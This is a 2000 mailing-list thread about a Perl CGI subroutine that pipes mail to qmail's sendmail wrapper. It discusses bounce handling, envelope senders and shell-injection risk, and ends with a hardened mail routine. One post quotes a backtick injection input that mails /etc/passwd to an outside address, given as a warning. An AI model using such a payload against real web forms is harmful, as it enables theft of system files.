Re: perl script acting funny
* Timothy Legant [EMAIL PROTECTED] [001112 19:28]:
> On Sun, Nov 12, 2000 at 12:55:08PM -0500, Peter Green wrote:
> > program with either [EMAIL PROTECTED] (the literal user and machine name
> > where the mail is originating) or the argument to the ``-f'' flag as
> > specified above.
>
> Does the sendmail wrapper ignore Return-Path and instead use
> [EMAIL PROTECTED]? Certainly qmail-inject doesn't, but I haven't
> experimented with /var/qmail/bin/sendmail to check

I was insinuating that it does, contrary to your statements. That had been
my experience, but if I was mistaken (which I don't doubt for a second :)
then I apologize for spreading vicious lies. ;)

/pg

--
Peter Green : Gospel Communications Network, SysAdmin : [EMAIL PROTECTED]
---
Linux is obsolete (Andrew Tanenbaum)
RE: perl script acting funny
I could be a little bit off-base, but it might be a bad idea to approach
your problem this way. For instance, what if a person enters somewhere in
the form:

`cat /etc/passwd | mail -s "You dumb f***, you just got hacked" [EMAIL PROTECTED]`

It is notoriously bad to use /usr/lib/sendmail from a CGI script. Try using
the Net::SMTP module instead. It uses sockets, so you wouldn't even have to
worry about your local MTA.

/Wes

Wesley A. Wannemacher
[EMAIL PROTECTED]
Instructor, Network Administrator
University of Northwestern Ohio
http://www.unoh.edu

-----Original Message-----
From: Greg Kopp [mailto:[EMAIL PROTECTED]]
Sent: Sunday, November 12, 2000 12:56 AM
To: [EMAIL PROTECTED]
Subject: perl script acting funny

I have qmail and vpopmail installed on RH 6.2. I have a perl subroutine
that we use to send e-mail. Here is the code snippet:

    sub mailto {
        $mailprog = '/usr/lib/sendmail';
        open(MAIL,"|$mailprog -t");
        my @args = @_;
        print MAIL "To: $args[0]\n";
        print MAIL "Bcc: $args[4]\n";
        print MAIL "From: $args[1]\n";
        print MAIL "Subject: $args[2]\n";
        print MAIL "$args[3]\n";
        close MAIL;
    }

BUT when a mail message gets bounced, the message comes back to the user
that the web server is running as. Looking at the bounce, I see this:

    Hi. This is the qmail-send program at ideastar.com.
    I'm afraid I wasn't able to deliver your message to the following
    addresses. This is a permanent error; I've given up. Sorry it didn't
    work out.

    [EMAIL PROTECTED]:
    128.11.69.53 failed after I sent the message.
    Remote host said: 554 delivery error: dd This user doesn't have a
    yahoo.com account ([EMAIL PROTECTED]) - mta129.mail.yahoo.com

    --- Below this line is a copy of the message.

    Return-Path: [EMAIL PROTECTED]
    Received: (qmail 509 invoked by uid 1001); 9 Nov 2000 20:20:12 -
    Date: 9 Nov 2000 20:20:12 -
    Message-ID: [EMAIL PROTECTED]
    To: [EMAIL PROTECTED]
    From: [EMAIL PROTECTED]
    Subject: Thank you

Any ideas what could be causing this and any possible solutions?

Thanks,
Greg
Re: perl script acting funny
* Wesley Wannemacher [EMAIL PROTECTED] [001113 15:09]:
> I could be a little bit off-base, but it might be a bad idea to approach
> your problem this way. For instance, what if a person enters somewhere in
> the form:
>
> `cat /etc/passwd | mail -s "You dumb f***, you just got hacked" [EMAIL PROTECTED]`

Where exactly would that line be exec'd? There is only one place in the
included code where stuff gets executed...there isn't any place to sneak
your little command to the shell.

> It is notoriously bad to use /usr/lib/sendmail from a CGI script. Try

Nah, it isn't all that bad. Especially since he isn't passing any
possibly-tainted data to the shell (in the open() line).

/pg

--
Peter Green : Gospel Communications Network, SysAdmin : [EMAIL PROTECTED]
---
The wise man can pick up a grain of sand and envision a whole universe.
But the stupid man will just lay down on some seaweed and roll around
until he's completely draped in it. Then he'll stand up and go: Hey, I'm
Vine Man. (Jack Handey)
Re: perl script acting funny
On Mon, Nov 13, 2000 at 03:04:27PM -0500, Wesley Wannemacher wrote:
> It is notoriously bad to use /usr/lib/sendmail from a CGI script. Try
> using the Net::SMTP module instead. It uses sockets, so you wouldn't
> even have to worry about your local MTA.

But you have to worry about connection failures, temporary errors, ...
By using Net::SMTP from a cgi you'd have to rebuild a complete queuing
strategy in case the mailserver doesn't accept the message.

\Maex

--
SpaceNet GmbH             | http://www.Space.Net/    | Stress is when you wake
Research Development      | mailto:[EMAIL PROTECTED] | up screaming and you
Joseph-Dollinger-Bogen 14 | Tel: +49 (89) 32356-0    | realize you haven't
D-80807 Muenchen          | Fax: +49 (89) 32356-299  | fallen asleep yet.
RE: perl script acting funny
I have not tested this, but I was under the impression that the shell might
present the problem on the last print statement:

    print MAIL "$args[3]\n";

I'll have to check the O'Reilly book on CGI programming, but this is pretty
bad if I remember correctly. I know that the formail code from Matt's
Script Archive was exploited this way. The only way to be sure is to test
it. As far as I can tell the flow of the program would be as follows:

    HTML Form -> PERL Code -> shell.

The backticks would be preparsed by the shell. The output of the backtick
statement would then be sent in the email. I am still somewhat of a perl
newbie, so I could be wrong. Although at this point you may be interacting
with the sendmail wrapper program. If this were the case, there is no risk.
I will try it later tonight and let everyone know.

/Wes

Wesley A. Wannemacher
[EMAIL PROTECTED]
Instructor, Network Administrator
University of Northwestern Ohio
http://www.unoh.edu

-----Original Message-----
From: Peter Green [mailto:[EMAIL PROTECTED]]
Sent: Monday, November 13, 2000 3:16 PM
To: [EMAIL PROTECTED]
Subject: Re: perl script acting funny

* Wesley Wannemacher [EMAIL PROTECTED] [001113 15:09]:
> I could be a little bit off-base, but it might be a bad idea to approach
> your problem this way. For instance, what if a person enters somewhere in
> the form:
>
> `cat /etc/passwd | mail -s "You dumb f***, you just got hacked" [EMAIL PROTECTED]`

Where exactly would that line be exec'd? There is only one place in the
included code where stuff gets executed...there isn't any place to sneak
your little command to the shell.

> It is notoriously bad to use /usr/lib/sendmail from a CGI script. Try

Nah, it isn't all that bad. Especially since he isn't passing any
possibly-tainted data to the shell (in the open() line).

/pg

--
Peter Green : Gospel Communications Network, SysAdmin : [EMAIL PROTECTED]
---
The wise man can pick up a grain of sand and envision a whole universe.
But the stupid man will just lay down on some seaweed and roll around
until he's completely draped in it. Then he'll stand up and go: Hey, I'm
Vine Man. (Jack Handey)
Re: perl script acting funny
Russ Allbery wrote:
> Greg Kopp [EMAIL PROTECTED] writes:
>
> > I have qmail and vpopmail installed on RH 6.2. I have a perl subroutine
> > that we use to send e-mail. Here is the code snippet:
> >
> >     sub mailto {
> >         $mailprog = '/usr/lib/sendmail';
> >         open(MAIL,"|$mailprog -t");
> >         my @args = @_;
> >         print MAIL "To: $args[0]\n";
> >         print MAIL "Bcc: $args[4]\n";
> >         print MAIL "From: $args[1]\n";
> >         print MAIL "Subject: $args[2]\n";
>
> There should be two \n after the last line of the headers.
>
> >         print MAIL "$args[3]\n";
> >         close MAIL;
> >     }
> >
> > BUT when a mail message gets bounced, the message comes back to the
> > user that the web server is running as.
>
> Bounces go back to the envelope sender. If you want to change the
> envelope sender, pass the -f option to the sendmail emulation program,
> as in:
>
>     /usr/lib/sendmail -t -f [EMAIL PROTECTED]
>
> --
> Russ Allbery ([EMAIL PROTECTED])  http://www.eyrie.org/~eagle/

You might as well add this header line:

    print MAIL "Return-Path: ...\n";

Regards
Fabrice Scemama
Re: perl script acting funny
also sprach fabrice:
> >     /usr/lib/sendmail -t -f [EMAIL PROTECTED]
>
> You might as well add this header line:
>
>     print MAIL "Return-Path: ...\n";

You can, though it won't do anything. It will be overwritten by the
sendmail program with either [EMAIL PROTECTED] (the literal user and
machine name where the mail is originating) or the argument to the ``-f''
flag as specified above. The man page for qmail-inject(8) (which is what
the sendmail wrapper really calls) says that ``Return-Path is deleted in
any case''.

/pg

--
Peter Green : Gospel Communications Network, SysAdmin : [EMAIL PROTECTED]
---
Is there any hope for me? Am I just thick? Does anyone remember the Rubik's
Cube, it was easier! I found that the Rubik's cube and Linux are alike.
Looks real confusing until you read the right book. :-)
(Seen on c.o.l.misc, about the "Linux Learning Curve")
Re: perl script acting funny
On Sun, Nov 12, 2000 at 12:55:08PM -0500, Peter Green wrote:
> also sprach fabrice:
> > >     /usr/lib/sendmail -t -f [EMAIL PROTECTED]
> >
> > You might as well add this header line:
> >
> >     print MAIL "Return-Path: ...\n";
>
> You can, though it won't do anything. It will be overwritten by the
> sendmail

I think what Fabrice is saying is that specifying the Return-Path header
is an alternative to using the -f switch on the sendmail/qmail-inject
command line. If you provide the Return-Path header to qmail-inject, it
will use the address(es) specified there as the envelope sender, which is
not quite the same as not doing anything. :)

> program with either [EMAIL PROTECTED] (the literal user and machine name
> where the mail is originating) or the argument to the ``-f'' flag as
> specified above.

Does the sendmail wrapper ignore Return-Path and instead use
[EMAIL PROTECTED]? Certainly qmail-inject doesn't, but I haven't
experimented with /var/qmail/bin/sendmail to check

> The man page for qmail-inject(8) (which is what the sendmail wrapper
> really calls) says that ``Return-Path is deleted in any case''.

This is true, but only *after* processing it and using it to set the
envelope sender. man qmail-header and see the SENDER ADDRESSES section.
Also, note that the -f option will override this behavior, as will having
an 's' in the QMAILINJECT environment, etc., etc.

> /pg

-thl
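Putting the thread's advice into one routine: Russ's -f envelope sender and the blank line after the headers, plus Peter's point that nothing user-supplied should reach the shell. This is an added example, not code from any of the posters; it assumes Perl 5.8 or later (for the list-form pipe open) and a bounce mailbox bounces@example.com that exists on the server.

```perl
#!/usr/bin/perl -T
use strict;
use warnings;

# Taint mode refuses to start a subprocess with an untrusted environment.
$ENV{PATH} = '/usr/bin:/bin';
delete @ENV{qw(IFS CDPATH ENV BASH_ENV)};

# Fixed envelope sender (assumed mailbox, not from the thread): bounces go
# here instead of to the account the web server runs as.
my $ENVELOPE_SENDER = 'bounces@example.com';
my $MAILPROG        = '/usr/lib/sendmail';

# A header value must stay on one line; with -t the MTA reads recipients
# from the headers, so a CR or LF in form input is rejected outright.
sub header_line {
    my ($name, $value) = @_;
    die "$name: value contains a line break\n" if $value =~ /[\r\n]/;
    return "$name: $value\n";
}

sub mailto {
    my ($to, $from, $subject, $body, $bcc) = @_;

    # List-form pipe open: sendmail is exec'd directly, no shell parses a
    # command line, and the only arguments are our own constants.
    open(my $mail, '|-', $MAILPROG, '-t', '-f', $ENVELOPE_SENDER)
        or die "cannot run $MAILPROG: $!\n";

    print $mail header_line('To',      $to);
    print $mail header_line('Bcc',     $bcc) if defined $bcc && length $bcc;
    print $mail header_line('From',    $from);
    print $mail header_line('Subject', $subject);
    print $mail "\n";          # the blank line that ends the header block
    print $mail $body, "\n";   # body is data on stdin, never executed

    close($mail) or die "sendmail exited with status ", $? >> 8, "\n";
    return 1;
}

# Constructed call: a backtick string in the body is delivered as text.
mailto('someone@example.net', 'webform@example.com', 'Thank you',
       'Your form said: `cat /etc/passwd`')
    if !caller && -x $MAILPROG;
```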